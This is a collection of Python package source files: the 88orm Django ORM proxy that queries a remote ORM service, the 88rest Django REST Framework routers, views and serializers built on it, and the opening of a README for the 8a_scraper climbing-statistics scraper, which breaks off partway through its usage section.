step = _slice.get('step')
data = list(self[start:stop:step])
else:
data = list(self[:self._CHUNK_SIZE])
if len(data) >= self._CHUNK_SIZE:
data[-1] = '...(remaining elements truncated)...'
return f"<Virtual Queryset {data}>"
return super(ORM88, self).__repr__()
def __iter__(self):
data = self._result_cache.get('result')
if not self._payload:
data = []
if data is None:
self._bind()
data = self._result_cache.get('result')
return iter(data)
def __len__(self):
count = self._result_cache.get("count", 0)
if not count and self.__last_query:
self._bind()
count = self._result_cache.get("count", 0)
return count
def __bool__(self):
return bool(len(self))
def __getitem__(self, item):
result_cache = self._result_cache.get('result')
if result_cache or self._prefetch_done:
return result_cache[item]
if isinstance(item, slice):
clone = self._clone()
clone._payload.update({
"slice": {
"start": item.start,
"stop": item.stop,
"step": item.step
}
})
return clone
_self = self._bind()
if _self == self:
result_cache = self._result_cache.get('result')
return result_cache[item]
return _self
def __call__(self, *args, **kwargs):
return VirtualModel(self._model_name, self.__payload_request)
@cached_property
def __exclude_params(self):
return [
"all",
"exists",
"count",
"first",
"last",
"latest",
"values",
"save",
"distinct"
]
@cached_property
def __is_model_instance(self):
for method in ["first", "last", "latest"]:
if self._payload.get(method):
return True
return False
@property
def __payload_request(self):
payload = {
"model": self._model_name,
"payload": self._payload,
"fields": self._fields,
"exclude_fields": self._exclude_fields
}
if self._app_label:
payload.update({
"app_label": self._app_label
})
return payload
@property
def __last_query(self) -> str:
"""
:return: last query
"""
queries = list(self._payload.keys()).copy()
if 'slice' in queries:
queries.pop(queries.index('slice'))
try:
return queries[-1]
except IndexError:
return ''
@property
def __is_return_different_object(self) -> bool:
return self.__last_query in [
'first', 'last', 'get', 'latest',
'exists', 'count', 'create'
]
@property
def __is_return_instance(self) -> bool:
return self.__last_query in ['first', 'last', 'get', 'latest', 'create']
def __update_payload(self, name, data) -> None:
try:
existed = self._payload.get(name).copy() # type: Dict
except AttributeError:
pass
else:
existed = existed.copy()
existed.update({
"args": [*existed.get("args", []), *data.get("args", [])],
"kwargs": {
**existed.get("kwargs"),
**data.get("kwargs")
}
})
data = existed
self._payload.update({
name: data
})
# --- expressions
def __resolve_q(self, args: Q) -> List:
"""
Resolve expression Q. e.g: Q(a=b) | Q(c=d).
:param params:
:param result:
:param extra_params:
:return:
"""
_, params, connector = args.deconstruct()
params = list(params)
for index, param in enumerate(params.copy()):
if isinstance(param, Q):
params[index] = self.__resolve_q(param)
elif isinstance(param, tuple):
params[index] = list(param)
return ['Q', params, connector]
def __resolve_expression(self, expr):
expression_handlers = {
"Q": self.__resolve_q
}
return expression_handlers.get(expr)
def __do_query(self, name, *args, **kwargs):
assert self._payload.get('slice') is None, \
"Cannot filter a query once a slice has been taken."
_args = list(args).copy()
for index, arg in enumerate(_args):
if isinstance(arg, Q):
_args[index] = self.__resolve_q(arg)
clone = self._clone()
for key, value in kwargs.copy().items():
if isinstance(value, VirtualModel):
related = self._get_related_field(key)
foreign_field = related.get('foreign_related_fields')
if foreign_field == 'timestampedmortalbasemodel_ptr':
foreign_field = 'pk'
elif hasattr(value, f'{foreign_field}_id'):
foreign_field = f'{foreign_field}_id'
if related.get('type') in ['ForeignKey', 'OneToOneField']:
kwargs.pop(key)
kwargs.update({
f'{key}_id': getattr(value, foreign_field)
})
elif isinstance(value, ORM88):
kwargs.update({
key: value.__payload_request
})
payload = {
"args": _args,
"kwargs": kwargs
}
clone.__update_payload(name, data=payload)
if clone.__is_return_different_object:
if clone.__is_return_instance:
return clone._bind()
return clone.fetch()
return clone
def _get_related_field(self, name):
return (self.model_info.get('fields').get(name) or
self.model_info.get('related_names').get(name))
def _clone(self):
"""
:return: clone of current class
"""
exclude_fields = self._exclude_fields
if isinstance(exclude_fields, (dict, list)):
exclude_fields = self._exclude_fields.copy()
model_name = self._model_name
if self._app_label:
model_name = f'{self._app_label}.{model_name}'
clone = self.__class__(
model=model_name,
fields=self._fields.copy(),
exclude_fields=exclude_fields
)
clone._payload = self._payload.copy()
return clone
def __clear_query(self, name=None):
if name is not None:
try:
del self._payload[name]
except KeyError:
pass
else:
self._payload = {}
def _bind(self, model=None, data=None):
if data is None:
data = self.fetch()
if isinstance(data, dict):
_model = model
if _model is None:
_model = self._model_name
vi = VirtualModel(
model=_model,
payload=self.__payload_request,
value=data,
model_info=self.model_info
)
return vi
vi = {
"result": [],
"count": 0
}
if isinstance(data, list):
if {'values', 'values_list'} & set(self._payload.keys()):
vi.update({
"result": data,
"count": len(data)
})
else:
for i in data:
_vi = VirtualModel(
model=self._model_name,
payload=self.__payload_request,
value=i,
model_info=self.model_info
)
vi.get('result').append(_vi)
vi.update({
"count": vi.get("count") + 1
})
self._result_cache = vi
return self
# for custom method
def call_manager_method(self, name, *args, **kwargs):
return self.__do_query(name, *args, **kwargs)
def _serialize_data(self, data: dict):
ret = data.copy()
for key, value in data.items():
if isinstance(value, (date, datetime)):
ret.update({
key: str(value)
})
elif isinstance(value, VirtualModel):
ret.pop(key)
ret.update({
f'{key}_id': value.pk
})
elif isinstance(value, ContentFile):
b64_value = base64.b64encode(value.file.getvalue())
value = f"data:image/jpeg;base64,{b64_value.decode()}"
ret.update({
key: value
})
return ret
# --- fetch data from orm services
def __request_get(self, url, payload, params=None):
if ORM_SERVICE_COMMUNICATION.get("method") == "rpc":
with ClusterRpcProxy(ORM_SERVICE_COMMUNICATION.get("conf")) as rpc:
return rpc.orm_service.query(payload)
response = requests.get(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
}, params=params)
if response.status_code == 400:
raise Exception(response.text)
elif response.status_code == 404:
raise self.DoesNotExist(
"%s matching query does not exist." % self._model_name.capitalize())
try:
return response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
def __request_post(self, url, payload):
if ORM_SERVICE_COMMUNICATION.get("method") == "rpc":
with ClusterRpcProxy(ORM_SERVICE_COMMUNICATION.get("conf")) as rpc:
return rpc.orm_service.query(payload)
response = requests.post(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
return response.json()
except json.decoder.JSONDecodeError:
raise Exception(response.text)
def fetch(self):
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=self.__payload_request
)
def fetch_with_relation(self, relation_data):
"""
fetch data with relation object
:param relation_data: -- e.g:
ORM88(model='partitem').all()
.fetch_with_relation({'member':[{'user': ['id', 'email']}]})
:return: -- response:
[{'member': {'user': {'id': 556, 'email': '[email protected]'}}},]
"""
payload = self.__payload_request.copy()
payload.update({
"relation_data": relation_data
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=payload
)
def get_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_property")
return self.__request_get(url=url, payload=payload)
def call_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/call_property")
return self.__request_get(url=url, payload=payload)
# --- querying
def get_queryset(self, *args, **kwargs):
return self.__do_query('all', *args, **kwargs)
def all(self):
return self.get_queryset()
def exists(self) -> bool:
return self.__do_query('exists')
def get(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('get', *args, **kwargs)
def filter(self, *args, **kwargs):
return self.__do_query('filter', *args, **kwargs)
def exclude(self, *args, **kwargs):
return self.__do_query('exclude', *args, **kwargs)
def values(self, *args, **kwargs):
return self.__do_query('values', *args, **kwargs)
def values_list(self, *args, **kwargs):
return self.__do_query('values_list', *args, **kwargs)
def count(self, *args, **kwargs) -> int:
return self.__do_query('count', *args, **kwargs)
def first(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('first', *args, **kwargs)
def last(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('last', *args, **kwargs)
def latest(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('latest', *args, **kwargs)
def order_by(self, *args, **kwargs):
return self.__do_query('order_by', *args, **kwargs)
def select_related(self, *args, **kwargs):
return self.__do_query('select_related', *args, **kwargs)
def prefetch_related(self, *args, **kwargs):
return self.__do_query('prefetch_related', *args, **kwargs)
def distinct(self, *args, **kwargs):
return self.__do_query('distinct', *args, **kwargs)
def only(self, *args, **kwargs):
return self.__do_query('only', *args, **kwargs)
def defer(self, *args, **kwargs):
return self.__do_query('defer', *args, **kwargs)
def create(self, *args, **kwargs):
return self.__do_query('create', *args, **kwargs)
def update(self, **kwargs):
self.__update_payload('update', data={
'args': [],
'kwargs': self._serialize_data(kwargs)
})
return self.fetch()
def delete(self):
self.__update_payload('delete', data={
'args': [],
'kwargs': {}
})
return self.fetch()
def get_or_create(self, *args, **kwargs):
try:
return self.get(*args, **kwargs), False
except self.DoesNotExist:
return self.create(**kwargs), True
def custom(self, name, **kwargs):
return self.__do_query(name, *(), **kwargs)
def filter_offline(self, **kwargs):
def _filter(item):
if isinstance(item, VirtualModel):
ret = []
for key, value in kwargs.items():
ret.append(getattr(item, key) == value)
return all(ret)
return False
return list(filter(_filter, self._result_cache.get('result', [])))
@classmethod
def execute_many(cls, payloads: List):
payload_requests = list(
map(lambda orm: orm._ORM88__payload_request, payloads)
)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/execute_many")
response = requests.get(url, data=json.dumps(payload_requests), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
response = response.json()
except Exception:
raise Exception(response.content)
else:
result = []
for index, orm_service in enumerate(payloads):
result.append(orm_service._bind(data=response[index]))
return result
def _save(self, payload, *args, **kwargs):
self.__do_query('save', *args, **kwargs)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/save")
payload.get('payload')['save'] = self._serialize_data(
payload.get('payload').get('save')
)
return self.__request_post(
url=url,
payload=payload
)
class DoesNotExist(ObjectDoesNotExist):
pass | 88orm | /88orm-0.1.9.1.tar.gz/88orm-0.1.9.1/orm88/connector.py | connector.py |
import json
from typing import Dict
from urllib.parse import urljoin
import requests
from django.conf import settings
from django.utils.functional import cached_property
from .related_descriptors import create_reverse_many_to_one
# NOTE: All models info will be stored here.
# contains fields and related_names,
# keep note don't redefine the MODELS variable
# for keeping the reactivity. If you want to
# change the value, just clear or append it.
MODELS = []
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": ""
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
class VirtualModel(object):
def __init__(
self,
model: str,
payload: dict,
value=None,
model_info=None
):
self._payload = payload
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
self.__model = model
self._app_label = app_label
self._attrs = {}
if not model_info:
model_info = get_model(model, app_label)
if not app_label:
self._app_label = model_info.get('app_label')
self._class_name = model_info.get('class_name')
self._fields = model_info.get('fields') # type: Dict
self._related_names = model_info.get('related_names') # type: Dict
if value:
self._set_value(value)
def __repr__(self):
if self._attrs:
key = self._attrs.get(
'__str__',
(self._attrs.get('id') or
self._attrs.get(
next(iter(self._attrs))
))
)
else:
key = None
return f"<{self._class_name}: {key}>"
def __setattr__(self, key, value):
try:
super(VirtualModel, self).__setattr__(key, value)
if key in self._fields or key in self._related_names:
if isinstance(value, dict):
info = self._fields.get(key, self._related_names.get(key))
related_model = info.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
value = self.__class__(model, self._payload, value=value)
super(VirtualModel, self).__setattr__(key, value)
self._attrs.update({
key: value
})
except Exception:
pass
@cached_property
def _save_fields(self):
fields = self._fields.copy()
for key, value in fields.copy().items():
if value.get('type') == 'ManyToManyField':
fields.pop(key)
return fields
def _set_attr_single_instance(self, key, value):
from .connector import ORM88
if not hasattr(self, key) and f"{key}_id" in self._attrs:
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORM88(model)
setattr(self, key, attr_value)
def set_many_to_one_or_many(self, key, value, related_field):
from .connector import ORM88
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
if hasattr(self, key):
_value = getattr(self, key)
if isinstance(_value, self.__class__):
return None
elif isinstance(_value, list):
attr_value = create_reverse_many_to_one(model, {
'filter': {
'args': [],
'kwargs': {
related_field: self.id
}
}
})()
attr_value._bind(data=_value)
attr_value._prefetch_done = True
elif isinstance(_value, dict):
attr_value = self.__class__(model, self._payload, value=_value)
else:
attr_value = ORM88(model)
else:
attr_value = ORM88(model)
type_field = self._fields.get(
key,
self._related_names.get(key, {})
).get('type')
payload = {}
if type_field in ['OneToOneField', 'OneToOneRel']:
payload.update({
'get': {
'args': [],
'kwargs': {
related_field: self.id
}
}
})
else:
payload.update({
'filter': {
'args': [],
'kwargs': {
related_field: self.id
}
}
})
attr_value._payload.update(payload)
setattr(self, key, attr_value)
def _set_related_attributes(self):
for key, value in self._fields.items():
type_field = value.get('type')
if type_field in ['ForeignKey', 'OneToOneField']:
self._set_attr_single_instance(key, value)
elif type_field == 'ManyToManyField':
related_model = value.get('related_model')
self.set_many_to_one_or_many(key, value,
related_model.get('related_query_name'))
for key, value in self._related_names.items():
related_model = value.get('related_model')
self.set_many_to_one_or_many(key, value, related_model.get('related_field'))
def _set_value(self, attrs: Dict):
self._attrs.update(attrs)
for key, value in attrs.items():
setattr(self, key, value)
self._set_related_attributes()
def _get_related(self, name):
from .connector import ORM88
attr = getattr(self, name)
if isinstance(attr, ORM88):
if name in self._fields:
field = self._fields.get(name)
if field.get('type') in ['ForeignKey', 'OneToOneField']:
attr = attr.get(id=self._attrs.get(f"{name}_id"))
setattr(self, name, attr)
return attr
elif field.get('type') == 'ManyToManyField':
return attr
return attr
def _reverse_related(self, related_name):
from .connector import ORM88
try:
orm = getattr(self, related_name) # type: ORM88
except AttributeError:
raise AttributeError(f'{self.__model} has no related {related_name}')
else:
if isinstance(orm, ORM88):
rel = self._related_names.get(related_name)
related_model = rel.get('related_model')
filter_kwargs = {
related_model.get('related_field'): self.id
}
if rel.get('type') == 'OneToOneRel':
orm = orm.get(**filter_kwargs)
setattr(self, related_name, orm)
return orm
return orm
def rel(self, name):
if name in self._fields:
return self._get_related(name)
return self._reverse_related(name)
def has_rel(self, name):
try:
return bool(self.rel(name))
except Exception:
return False
def refresh_from_db(self):
from .connector import ORM88
instance = ORM88(
model=self.__model,
fields=list(self._attrs)
)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
attrs = instance._ORM88__request_get(
url=url,
payload=self._payload
)
if isinstance(attrs, dict):
for key, value in attrs.items():
setattr(self, key, value)
return self
raise ValueError(attrs)
def save(self):
from .connector import ORM88
instance = ORM88(
model=self.__model,
fields=list(self._attrs)
)
payload = self._payload.copy()
model_fields = {}
for field in self._save_fields:
value = self._attrs.get(field)
if isinstance(value, ORM88):
field = f'{field}_id'
value = getattr(self, field)
if value is not None:
model_fields.update({
field: value
})
payload.get("payload").update({
"save": model_fields
})
ret = instance._save(payload)
self._set_value(ret)
self._payload.get('payload').pop('save')
self._payload.get('payload').update({
'get': {
'args': [],
'kwargs': {
'id': self.id
}
}
})
return self
class ModelNotFound(Exception):
pass
class MultipleModelsReturned(Exception):
pass
def initialize_models(force=False):
global MODELS
if not MODELS or force:
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_models")
response = requests.get(url, headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
if response.status_code == 400:
raise Exception(response.text)
try:
response = response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
else:
MODELS.clear()
MODELS += response
def get_model(name: str, app_label=None) -> Dict:
initialize_models()
name = name.lower()
result = list(filter(
lambda model: model.get('model') == name,
MODELS
))
if app_label:
result = list(filter(
lambda model: model.get('app_label') == app_label,
result
))
if not result:
msg = f"Cannot find model {name}"
if app_label:
msg = f"{msg} with app_label {app_label}"
raise ModelNotFound(msg)
if len(result) > 1:
multiple = list(map(lambda x: x.get('app_label'), result))
raise MultipleModelsReturned(f"Please provide app_label: {multiple}")
return result[0] | 88orm | /88orm-0.1.9.1.tar.gz/88orm-0.1.9.1/orm88/models.py | models.py |
from collections import OrderedDict
from django.conf.urls import url
from rest_framework.routers import (
SimpleRouter as _SimpleRouter,
APIRootView,
SchemaView,
SchemaGenerator
)
from rest_framework.settings import api_settings
from rest_framework.urlpatterns import format_suffix_patterns
from orm88.connector import ORM88
class SimpleRouter(_SimpleRouter):
def get_default_basename(self, viewset):
"""
If `basename` is not specified, attempt to automatically determine
it from the viewset.
"""
queryset = getattr(viewset, 'queryset', None) # type: ORM88
assert queryset is not None, (
'`basename` argument not specified, '
'and could not automatically determine '
'the name from the viewset, as it does '
'not have a `.queryset` attribute.'
)
return queryset._model_name.lower()
class DefaultRouter(SimpleRouter):
"""
The default router extends the SimpleRouter, but also adds in a default
API root view, and adds format suffix patterns to the URLs.
"""
include_root_view = True
include_format_suffixes = True
root_view_name = 'api-root'
default_schema_renderers = None
APIRootView = APIRootView
APISchemaView = SchemaView
SchemaGenerator = SchemaGenerator
def __init__(self, *args, **kwargs):
if 'root_renderers' in kwargs:
self.root_renderers = kwargs.pop('root_renderers')
else:
self.root_renderers = list(api_settings.DEFAULT_RENDERER_CLASSES)
super().__init__(*args, **kwargs)
def get_api_root_view(self, api_urls=None):
"""
Return a basic root view.
"""
api_root_dict = OrderedDict()
list_name = self.routes[0].name
for prefix, viewset, basename in self.registry:
api_root_dict[prefix] = list_name.format(basename=basename)
return self.APIRootView.as_view(api_root_dict=api_root_dict)
def get_urls(self):
"""
Generate the list of URL patterns, including a default root view
for the API, and appending `.json` style format suffixes.
"""
urls = super().get_urls()
if self.include_root_view:
view = self.get_api_root_view(api_urls=urls)
root_url = url(r'^$', view, name=self.root_view_name)
urls.append(root_url)
if self.include_format_suffixes:
urls = format_suffix_patterns(urls)
return urls | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/routers.py | routers.py |
from django.db.models.query import QuerySet
from django.http import Http404
from rest_framework.settings import api_settings
from .views import APIView
def get_object_or_404(queryset, *filter_args, **filter_kwargs):
"""
Same as Django's standard shortcut, but make sure to also raise 404
if the filter_kwargs don't match the required types.
"""
try:
return queryset.get(*filter_args, **filter_kwargs)
except queryset.DoesNotExist:
raise Http404
class GenericAPIView(APIView):
"""
Base class for all other generic views.
"""
# You'll need to either set these attributes,
# or override `get_queryset()`/`get_serializer_class()`.
# If you are overriding a view method, it is important that you call
# `get_queryset()` instead of accessing the `queryset` property directly,
# as `queryset` will get evaluated only once, and those results are cached
# for all subsequent requests.
queryset = None
serializer_class = None
# If you want to use object lookups other than pk, set 'lookup_field'.
# For more complex lookup requirements override `get_object()`.
lookup_field = 'pk'
lookup_url_kwarg = None
# The filter backend classes to use for queryset filtering
filter_backends = api_settings.DEFAULT_FILTER_BACKENDS
# The style to use for queryset pagination.
pagination_class = api_settings.DEFAULT_PAGINATION_CLASS
def get_queryset(self):
"""
Get the list of items for this view.
This must be an iterable, and may be a queryset.
Defaults to using `self.queryset`.
This method should always be used rather than accessing `self.queryset`
directly, as `self.queryset` gets evaluated only once, and those results
are cached for all subsequent requests.
You may want to override this if you need to provide different
querysets depending on the incoming request.
(Eg. return a list of items that is specific to the user)
"""
assert self.queryset is not None, (
"'%s' should either include a `queryset` attribute, "
"or override the `get_queryset()` method."
% self.__class__.__name__
)
queryset = self.queryset
if isinstance(queryset, QuerySet):
# Ensure queryset is re-evaluated on each request.
queryset = queryset.all()
return queryset
def get_object(self):
"""
Returns the object the view is displaying.
You may want to override this if you need to provide non-standard
queryset lookups. Eg if objects are referenced using multiple
keyword arguments in the url conf.
"""
queryset = self.filter_queryset(self.get_queryset())
# Perform the lookup filtering.
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
assert lookup_url_kwarg in self.kwargs, (
'Expected view %s to be called with a URL keyword argument '
'named "%s". Fix your URL conf, or set the `.lookup_field` '
'attribute on the view correctly.' %
(self.__class__.__name__, lookup_url_kwarg)
)
filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
obj = get_object_or_404(queryset, **filter_kwargs)
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
def get_serializer(self, *args, **kwargs):
"""
Return the serializer instance that should be used for validating and
deserializing input, and for serializing output.
"""
serializer_class = self.get_serializer_class()
kwargs['context'] = self.get_serializer_context()
return serializer_class(*args, **kwargs)
def get_serializer_class(self):
"""
Return the class to use for the serializer.
Defaults to using `self.serializer_class`.
You may want to override this if you need to provide different
serializations depending on the incoming request.
(Eg. admins get full serialization, others get basic serialization)
"""
assert self.serializer_class is not None, (
"'%s' should either include a `serializer_class` attribute, "
"or override the `get_serializer_class()` method."
% self.__class__.__name__
)
return self.serializer_class
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
return {
'request': self.request,
'format': self.format_kwarg,
'view': self
}
def filter_queryset(self, queryset):
"""
Given a queryset, filter it with whichever filter backend is in use.
You are unlikely to want to override this method, although you may need
to call it either from a list view, or from a custom `get_object`
method if you want to apply the configured filtering backend to the
default queryset.
"""
for backend in list(self.filter_backends):
queryset = backend().filter_queryset(self.request, queryset, self)
return queryset
@property
def paginator(self):
"""
The paginator instance associated with the view, or `None`.
"""
if not hasattr(self, '_paginator'):
if self.pagination_class is None:
self._paginator = None
else:
self._paginator = self.pagination_class()
return self._paginator
def paginate_queryset(self, queryset):
"""
Return a single page of results, or `None` if pagination is disabled.
"""
if self.paginator is None:
return None
return self.paginator.paginate_queryset(queryset, self.request, view=self)
def get_paginated_response(self, data):
"""
Return a paginated style `Response` object for the given output data.
"""
assert self.paginator is not None
return self.paginator.get_paginated_response(data) | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/generics.py | generics.py |
from collections import OrderedDict
from typing import Dict
from rest_framework import serializers
from orm88.connector import ORM88
class ModelSerializer(serializers.Serializer):
map_fields = {
'AutoField': serializers.IntegerField,
'CharField': serializers.CharField,
'IntegerField': serializers.IntegerField,
'BooleanField': serializers.BooleanField,
'ListField': serializers.ListField,
'OneToOneField': serializers.IntegerField,
'ForeignKey': serializers.IntegerField
}
def get_fields(self) -> Dict:
assert hasattr(self, 'Meta'), (
'Class {serializer_class} missing "Meta" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'model'), (
'Class {serializer_class} missing "Meta.model" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'fields'), (
'Class {serializer_class} missing "Meta.fields" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert len(self.Meta.fields) > 0, (
'Are you stupid, you\'re put a blank list on "Meta.fields"'
)
ret = super(ModelSerializer, self).get_fields()
declared_fields = self.Meta.fields
if hasattr(self.Meta, 'read_only_fields'):
declared_fields = self.Meta.read_only_fields
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
model_related = model_info.get('related_names')
if isinstance(declared_fields, str):
declared_fields = model_fields
uncreated_fields = set(declared_fields) - set(ret.keys())
if uncreated_fields:
for uncreated_field in uncreated_fields:
if uncreated_field in model_fields:
field = model_fields.get(uncreated_field).get('type')
elif uncreated_field in model_related:
field = 'ListField'
if model_related.get(uncreated_field).get('type') == 'OneToOneRel':
field = 'IntegerField'
else:
field = 'CharField'
field_class = self.map_fields.get(field, serializers.CharField)
ret.update({
uncreated_field: field_class()
})
for key, value in ret.items():
value.bind(key, self)
return ret
def to_representation(self, instance):
ret = OrderedDict()
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
for field, field_class in self.get_fields().items():
if field_class.__class__.__name__ == 'SerializerMethodField':
value = instance
else:
attr = field_class.source or field
try:
if model_fields.get(attr).get('type') in ['ForeignKey', 'OneToOneField']:
attr = f"{attr}_id"
except AttributeError:
pass
value = getattr(instance, attr, None)
if isinstance(value, ORM88):
if attr in model_info.get('related_names'):
value = instance.rel(attr)
if value is not None:
value = field_class.to_representation(value)
ret[field] = value
return ret | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/serializers.py | serializers.py |
from collections import OrderedDict
from functools import update_wrapper
from inspect import getmembers
from django.urls import NoReverseMatch
from django.utils.decorators import classonlymethod
from django.views.decorators.csrf import csrf_exempt
from rest_framework import mixins
from rest_framework.reverse import reverse
from .generics import GenericAPIView
from .views import APIView
def _is_extra_action(attr):
return hasattr(attr, 'mapping')
class ViewSetMixin:
"""
This is the magic.
Overrides `.as_view()` so that it takes an `actions` keyword that performs
the binding of HTTP methods to actions on the Resource.
For example, to create a concrete view binding the 'GET' and 'POST' methods
to the 'list' and 'create' actions...
view = MyViewSet.as_view({'get': 'list', 'post': 'create'})
"""
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""
Because of the way class based views create a closure around the
instantiated view, we need to totally reimplement `.as_view`,
and slightly modify the view function that is created and returned.
"""
# The name and description initkwargs may be explicitly overridden for
# certain route configurations. eg, names of extra actions.
cls.name = None
cls.description = None
# The suffix initkwarg is reserved for displaying the viewset type.
# This initkwarg should have no effect if the name is provided.
# eg. 'List' or 'Instance'.
cls.suffix = None
# The detail initkwarg is reserved for introspecting the viewset type.
cls.detail = None
# Setting a basename allows a view to reverse its action urls. This
# value is provided by the router through the initkwargs.
cls.basename = None
# actions must not be empty
if not actions:
raise TypeError("The `actions` argument must be provided when "
"calling `.as_view()` on a ViewSet. For example "
"`.as_view({'get': 'list'})`")
# sanitize keyword arguments
for key in initkwargs:
if key in cls.http_method_names:
raise TypeError("You tried to pass in the %s method name as a "
"keyword argument to %s(). Don't do that."
% (key, cls.__name__))
if not hasattr(cls, key):
raise TypeError("%s() received an invalid keyword %r" % (
cls.__name__, key))
# name and suffix are mutually exclusive
if 'name' in initkwargs and 'suffix' in initkwargs:
raise TypeError("%s() received both `name` and `suffix`, which are "
"mutually exclusive arguments." % (cls.__name__))
def view(request, *args, **kwargs):
self = cls(**initkwargs)
# We also store the mapping of request methods to actions,
# so that we can later set the action attribute.
# eg. `self.action = 'list'` on an incoming GET request.
self.action_map = actions
# Bind methods to actions
# This is the bit that's different to a standard view
for method, action in actions.items():
handler = getattr(self, action)
setattr(self, method, handler)
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
self.request = request
self.args = args
self.kwargs = kwargs
# And continue as usual
return self.dispatch(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
# and possible attributes set by decorators
# like csrf_exempt from dispatch
update_wrapper(view, cls.dispatch, assigned=())
# We need to set these on the view function, so that breadcrumb
# generation can pick out these bits of information from a
# resolved URL.
view.cls = cls
view.initkwargs = initkwargs
view.actions = actions
return csrf_exempt(view)
def initialize_request(self, request, *args, **kwargs):
"""
Set the `.action` attribute on the view, depending on the request method.
"""
request = super().initialize_request(request, *args, **kwargs)
method = request.method.lower()
if method == 'options':
# This is a special case as we always provide handling for the
# options method in the base `View` class.
# Unlike the other explicitly defined actions, 'metadata' is implicit.
self.action = 'metadata'
else:
self.action = self.action_map.get(method)
return request
def reverse_action(self, url_name, *args, **kwargs):
"""
Reverse the action for the given `url_name`.
"""
url_name = '%s-%s' % (self.basename, url_name)
kwargs.setdefault('request', self.request)
return reverse(url_name, *args, **kwargs)
@classmethod
def get_extra_actions(cls):
"""
Get the methods that are marked as an extra ViewSet `@action`.
"""
return [method for _, method in getmembers(cls, _is_extra_action)]
def get_extra_action_url_map(self):
"""
Build a map of {names: urls} for the extra actions.
This method will noop if `detail` was not provided as a view initkwarg.
"""
action_urls = OrderedDict()
# exit early if `detail` has not been provided
if self.detail is None:
return action_urls
# filter for the relevant extra actions
actions = [
action for action in self.get_extra_actions()
if action.detail == self.detail
]
for action in actions:
try:
url_name = '%s-%s' % (self.basename, action.url_name)
url = reverse(url_name, self.args, self.kwargs, request=self.request)
view = self.__class__(**action.kwargs)
action_urls[view.get_view_name()] = url
except NoReverseMatch:
pass # URL requires additional arguments, ignore
return action_urls
class ViewSet(ViewSetMixin, APIView):
"""
The base ViewSet class does not provide any actions by default.
"""
pass
class GenericViewSet(ViewSetMixin, GenericAPIView):
"""
The GenericViewSet class does not provide any actions by default,
but does include the base set of generic view behavior, such as
the `get_object` and `get_queryset` methods.
"""
pass
class ReadOnlyModelViewSet(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `list()` and `retrieve()` actions.
"""
pass
class ModelViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `create()`, `retrieve()`, `update()`,
`partial_update()`, `destroy()` and `list()` actions.
"""
pass | 88rest | /88rest-0.1.9.tar.gz/88rest-0.1.9/rest88/viewsets.py | viewsets.py |
# 8a_scraper
[8a](https://www.8a.nu/) is a great resource to aggregate statistics on sportclimbers and boulderers. They recently deployed a new version of their website that rendered all the prior scrapers obsolete.
This tool allows 8a users to scrape content from the website using their username, password, Selenium, and BeautifulSoup.
## Installing
### Via `pip`
Install using the following command:
`pip install 8a-scraper`
The latest version is `0.0.3`. If you have already installed the package, please update it using the following command:
`pip install 8a-scraper --upgrade`
### Via GitHub
Alternatively, you can just clone this repo and import the libraries at your own discretion.
## Usage
To install the package,
This package requires the user to also install Google Chrome and [ChromeDriver](https://chromedriver.chromium.org/downloads).
Please ensure that the version of ChromeDriver install matches your current version of Google Chrome. You can check your current version of Google Chrome by opening Chrome and checking the 'About Google Chrome' panel. Ensure that the chromedriver executable is in your `$PATH` variable as well.
The user must also have an email and password that can be used to log into [8a](https://www.8a.nu/)
Additionally, the user must set the following environment variables with their current login info:
